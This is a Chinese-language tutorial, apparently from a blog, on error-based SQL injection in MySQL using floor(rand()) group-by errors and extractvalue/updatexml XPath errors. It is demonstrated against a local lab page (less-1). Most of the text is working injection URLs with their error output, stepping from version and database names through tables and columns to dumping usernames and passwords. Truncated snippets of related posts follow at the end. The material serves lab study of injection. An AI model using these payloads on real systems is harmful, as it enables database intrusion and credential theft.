報錯注入方法

1.1 introduce:

對rand函式操作時產生錯誤

1.2 principle analysis

1.3 sql:

select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));

concat():連線字串

floor()：取float的整數值
rand()：取0~1之間隨機浮點值
group by：根據乙個或多個列對結果集進行分組並有排序功能

error 1062 (23000): duplicate entry '5.5.44-0ubuntu0.14.04.11' for key 'group_key'

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)));--+

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select version()),0x7e,floor(rand(0)*2)));--+

duplicate entry '~5.5.44-0ubuntu0.14.04.1~1' for key 'group_key'

1.9.1 查詢庫名

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2)));--+

duplicate entry '~security~1' for key 'group_key'

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e,floor(rand(0)*2)));--+

duplicate entry '~emails~1' for key 'group_key'

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)));--+

duplicate entry '~emails~1' for key 'group_key'

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand(0)*2)));--+

duplicate entry '~id~1' for key 'group_key'

http://localhost/less-1/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)));--+

duplicate entry '~dumb~dumb~1' for key 'group_key'

第乙個引數：xml_document是string格式，為xml文件物件的名稱，圖中為doc

第二個引數：xpath_string(xpath格式的字串)
作用：從目標xml中返回包含所查詢值的字串

xpath語法錯誤產生報錯

select extractvalue(1,concat(0x7e,(select user()),0x7e));

error 1105 (hy000): xpath syntax error: '~root@localhost~'

第乙個引數：xml_document是string格式，為xml文件物件的名稱，圖中為doc

第二個引數：xpath_string(xpath格式的字串)
第三個引數：new_value，string格式，替換查詢到的符合條件的資料
作用：改變文件中符合條件的節點的值

updataxml()語法錯誤產生報錯

select updatexml(1,concat(0x7e,(select user()),0x7e),1);

error 1105 (hy000): xpath syntax error: '~root@localhost~'

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料，但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...

SQL注入 報錯注入

sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...

SQL注入 報錯注入

利用 mysql select 1 from select count concat version floor rand 0 2 x from information schema.tables group by x a error 1062 23000 duplicate entry 5.1.4...